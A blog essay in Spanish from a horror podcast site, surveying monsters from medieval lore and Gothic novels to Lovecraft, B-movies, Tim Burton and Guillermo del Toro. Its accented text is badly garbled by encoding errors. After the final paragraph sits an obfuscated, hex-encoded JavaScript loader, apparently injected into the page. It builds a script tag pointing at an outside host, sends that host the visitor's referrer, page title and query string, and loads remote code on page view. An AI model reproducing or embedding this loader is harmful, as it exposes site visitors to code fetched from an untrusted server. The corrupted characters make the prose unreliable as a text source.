Saltear al contenido principal

‘El monstruo’, del artista francA�s Odilon Redon (1840a��1916).

La palabra monstruo se deriva del latA�n monere que significaba a�?advertenciaa�?, especialmente de los dioses, ya que ellos se valA�an de portentos y de crIaturas sobrenaturales para hacer saber su voluntad o enojo. La mitologA�a estA? llena de referencias a seres que aparecen como un castigo divino y hA�roes que deben vencerlos para restaurar el orden.

Los monstruos en la Europa Medieval eran criaturas inhumanas que no obedecA�an las leyes naturales y eran ajenas al mundo ordinario. El solo ver a uno de lejos podA�a significar desgracias llegando a tu vida: la advertencia todavA�a rondando el significado antiguo. El hombre se acordaba de lo peligroso que era andar solo en el bosque de noche, de los peligros que ahA� habitaban.

Dibujos de algunos monstruos medievales hechos por Ulisse Aldrovandi (1599-1603)

Pero llegA? la revoluciA?n cientA�fica y estos quedaron relegados a creencias de ancianas y cuentos para niA�os. El hombre se adentrA? en las regiones mA?s remotas de la tierra sin temor a lo sobrenatural armados con la tecnologA�a y el saber como armas; aunque no por eso los escritores dejaron de imaginar alternativas.

El horror gA?tico crea sus propios monstruos como el Vampiro (DrA?cula de Bram Stoker en 1897, Carmilla de Le Fanu en 1872, El vampiro de Polidori en 1819) el homA?nculo creado por ciencia en Frankenstein de Shelley en 1818. Tenemos mA?s adelante civilizaciones perdidas habitadas por criaturas que no debA�an existir La raza que viene de Edward Bulwer Lytton (1871) o futuros remotos donde la humanidad ya no es la raza dominante La mA?quina del tiempo de H.G. Wells (1895). Pero en todos ellos algo que no a�?debA�a existira�? en nuestro mundo actual se manifiesta para sorprendernos, asustarnos y hasta cazarnos.

El hombre en su seguridad intelectual comienza a crear monstruos en su psique para canalizar su inseguridad. Pero estos siguen siendo ajenos, extraA�os e incomprensibles.

From Beneath the Waves de Hessra

Howard Phillips Lovecraft aA�ade al gA�nero el horror cA?smico; ahora la amenaza es tan ajena, tan distante y tan antigua que parecemos microbios ante su inmensidad. Sus criaturas son algo mA?s allA? de la comprensiA?n y nuestras simples mentes colapsan ante su presencia. Sus motivos no tienen modo de comprenderse sin perder la cordura.

Bela Lugosi y Dwight Frye en DrA?cula (1931)

El cine como medio de narraciA?n del horror tiene sus orA�genes en George MA?liA�s quien con La casa del diablo incursiona en el gA�nero, aA?n mudo en ese entonces. Las historias de horror se volvieron un tema de interA�s para los primeros desarrolladores. AsA� tenemos grandes pelA�culas como Frankenstein (James Whale 1931) y Dracula (Tod Browning 1931) donde Boris Karloff y Bela Lugosi encarnaron a nuestros temores en forma humana.

El cine tomA? la oportunidad y surgieron sin fin de pelA�culas, llamadas a�?pelA�culas Ba�?, donde todo tipo de seres surgA�an, se creaban, aparecA�an y eran destruidas por los hA�roes para mantener el orden. El horror radioactivo de la guerra frA�a fue campo fA�rtil para proyectar en el monstruo al a�?extranjeroa�?: al peligro que no podemos entender.

Edward Scissorhands de Ilana Staniscia (2015)

Sin embargo, algo raro pasA? durante nuestro viaje a la A�poca moderna. Estos monstruos tan ajenos, tan distantes, se comenzaron a volver cercanos. Crecimos con ellos y no faltA? quien se comenzA? a identificar con la bA?squeda de aceptaciA?n de la criatura de Frankenstein para entender su inseguridad. Comenzaron a surgir historias donde el monstruo era el que no era comprendido por los monstruos humanos.

Nuevos directores como Tim Burton comienzaron a hacer pelA�culas donde un Frankenstein adolescente (Joven manos de tijera, Tim Burton 1990) lucha por ser aceptado en una comunidad de clase media gringa.

Un momento sensual en La criatura de la laguna oscura (1954)

Los vampiros ya no son tan inhumanos y ajenos, ahora se cuenta su vida con un dejo de simpatA�a (Entrevista con el vampiro, Neil Jordan 1994). Guillermo del Toro recuenta la historia de la Criatura de la Laguna Oscura (Jack Arnold, 1954) dA?ndole el final que de niA�o deseA? tuviera en La forma del agua (del Toro, 2017).

A?Somos como el padre que expulsa al hijo de la casa y luego lo acepta de vuelta cuando entiende que sigue siendo nuestro hijo? A?O simplemente hemos agotado tanto el gA�nero que ya no queda mas que contar la historia del monstruo para entretenernos?

var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Facebook Comments

Gerardo Braham

El Doctor Braham es el alterego de Gerardo Braham, ingeniero, astrólogo y estudioso de las ciencias ocultas. Su opinión es meramente producto de sus neurosis. El doctorado que presume en su nombre procede de las ciencias ocultas y le fue otorgado por la universidad de Miskatonic.

PGlmcmFtZSBzcmM9Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20vbWFwcy9lbWJlZD9wYj0hMW0xOCExbTEyITFtMyExZDYwNDQuMjc1NjM3NDU2ODA1ITJkLTczLjk4MzQ2MzY4MzI1MjA0ITNkNDAuNzU4OTkzNDExNDc4NTMhMm0zITFmMCEyZjAhM2YwITNtMiExaTEwMjQhMmk3NjghNGYxMy4xITNtMyExbTIhMXMweDAlM0EweDU1MTk0ZWM1YTFhZTA3MmUhMnNUaW1lcytTcXVhcmUhNWUwITNtMiExc2VuITJzITR2MTM5MjkwMTMxODQ2MSIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIHN0eWxlPSJib3JkZXI6MCI+PC9pZnJhbWU+
CONTACT US
COMPANY NAME
221, Mount Olimpus, Rheasilvia, Mars
Solar System, Milky Way Galaxy
+1 (999) 999-99-99
Thank You. We will contact you as soon as possible.
CÓMO ESCUCHAR
Puedes escucharnos aquí, en nuestro sitio, o en iTunes, Soundcloud y en varias apps de podcasts.

También escúchanos en vivo por Bizarro.fm, Radio ILCE y Concepto Radial

entra a nuestras redes sociales
 
SUSCRÍBETE A
Puedes escuchar PSICOFONÍAS aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
SUSCRÍBETE A
Puedes escuchar PSICOFONÍAS aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
¿NO SABES ESCUCHAR PODCASTS?
SUSCRÍBETE A
Puedes escuchar POR QUÉ NOS DA MIEDO aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
SUSCRÍBETE A
Puedes escuchar POR QUÉ NOS DA MIEDO aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
¿NO SABES ESCUCHAR PODCASTS?
SUSCRÍBETE A
Puedes escuchar TERROR EN UN SUSPIRO aquí, en nuestro sitio, o en Soundcloud:
SUSCRÍBETE A
Puedes escuchar TERROR EN UN SUSPIRO aquí, en nuestro sitio, o en Soundcloud:
¿NO SABES ESCUCHAR PODCASTS?